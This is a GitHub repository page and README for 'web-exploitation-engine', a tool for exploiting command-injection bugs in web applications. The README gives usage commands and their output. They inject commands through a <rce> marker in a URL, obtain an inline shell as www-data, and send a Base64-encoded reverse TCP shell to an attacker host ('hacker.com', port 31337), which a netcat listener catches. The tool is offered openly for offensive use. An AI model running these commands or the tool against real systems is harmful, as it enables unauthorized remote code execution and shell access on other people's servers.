GitHub - infodox/web-exploitation-engine: Generic Command Exploitation Engine for exploiting web application command-injection bugs,.

infodox / web-exploitation-engine Public

Notifications You must be signed in to change notification settings
Fork 17
Star 31

Generic Command Exploitation Engine for exploiting web application command-injection bugs,.

31 stars 17 forks Branches Tags Activity

Notifications

Name		Name	Last commit message	Last commit date
Latest commit History 5 Commits
payloads		payloads
README		README
README.md~		README.md~
TODO		TODO
we.py		we.py

Repository files navigation

Web Exploitation Engine - Generic Command Injection Exploitation Utility.

This is a simple enough utility written to exploit command injection bugs
in web applications.

I had abandoned this project a while ago, then saw the brilliant "rce.py"
tool written by @LaNMaSteR53, and saw his elegant solution to the "how to
denote where to put the payload" problem, so I shamelessly ripped his code
to write this.

This tool can either give an inline shell like the original rce.py (it uses
the same functions, just rewritten to suit), or a reverse shell.
Currently it only supports a Base64 encoded Reverse TCP shell payload,
however the magic of the "payloads" module is that you can actually expand it.
You just have to do a little work to add more payloads.

So, how do I use this.

The only mandatory argument is --url='URL HERE'.
In the url, using the <rce> tag, you specify where to inject code in the request.

For example:
h4x# ./we.py --url='http://localhost/test/cmd.php?=<rce>'
shell> id 
[*] Executed: id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

shell>

By default, it assumes a GET request and uses the inline shell mode.

To specify a POST request, you pass the params and values just like a GET,
except you specify --method=post to tell the parser it is a POST injection.

For example:
h4x# ./we.py --url='http://localhost/test/cmd-post.php?cmd=<rce>' --method=post
shell> id
[*] Executed: id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

shell>

The --shell arguement tells it if you want an inline, or reverse shell. Default
operation is the "inline shell" like the original rce.py script.

To do a reverse shell, --shell=reverse is needed. You also must specify the 
host and port to connect to.

--lhost and --lport arguments are, by default, 127.0.0.1 and 4444 respectively.

So, to get a reverse shell sent to port 31337 on "hacker.com", using the above
GET request exploit, we can do the following.

h4x# ./we.py --url='http://localhost/test/cmd.php?cmd=<rce>' --shell=reverse --lhost=hacker.com --lport=31337
[+] Doing a reverse shell!
[*] LHOST: hacker.com
[*] LPORT: 31337
[!] Hope your listener is listening


And over at "hacker.com" (localhost on my box for this demo), we get the following:
# nc -lvp 31337
listening on [any] 31337 ...
connect to [127.0.0.1] from localhost [127.0.0.1] 58794
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$

Reverse shell access works rather flawlessly. For now, just the python-reverse payload, however
I hope to add a python bindshell soon, along with, perhaps, some Perl payloads for extra fun.